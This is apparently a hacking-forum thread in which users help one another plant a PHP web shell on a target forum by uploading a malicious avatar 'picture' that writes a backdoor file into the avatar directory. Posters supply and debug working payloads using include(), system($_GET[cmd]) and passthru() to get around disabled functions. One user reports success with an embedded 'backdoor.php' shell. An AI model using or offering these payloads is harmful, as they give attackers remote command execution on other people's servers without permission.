io !!! http://video.antichat.net/videos/ShAnKaR/xak.rar I have an error with the picture.. Parse error: parse error, unexpected ')' in /space_3/mrtom/forum/img/avatars/q.php on line 1 My picture : <? $fd=fopen('img/avatars/q.php','w+'); fwrite($fd,"<? include($fuck); ?>") fclose($fd); ?> Please, somebody to give me an original picture ? Thank'S
Right code: <? $f = fopen( "img/avatars/q.php", "w"); fwrite( $f, "<? include($fuck); ?>" ); fclose( $f ); ?> or $f = fopen( "img/avatars/q.php", "w"); fwrite( $f, "<? system($fuck); ?>" ); fclose( $f ); ?> - then $fuck parameter specify SHELL COMMAND, not file to include
<?php $shell="<?php system(\$_GET[cmd]);?>"; $fopen=fopen("img/avatars/q.php","a+"); fwrite($fopen,$shell); ?> Make so if you have access in that directory then all will work..
Warning: system() has been disabled for security reasons in /space_3/mrtom/forum/img/avatars/c.php on line 1 with : <?php $shell="<?php system(\$_GET[cmd]);?>"; $fopen=fopen("img/avatars/c.php","a+"); fwrite($fopen,$shell); ?> not other means?
system() function created for execute commands, system( "ls -ailrt" ); for example. this function was disabled for security reasons by admin. try to change system() to passthru(). if there has not works, use only file includin'... you can see it on ShAnKaR's video... че сказал сам нипонил
no good.. BUT !! !! !!!! I put the code of "backdoor.php" (shellZ) in the picture and it's Good ! Thx KeZ and others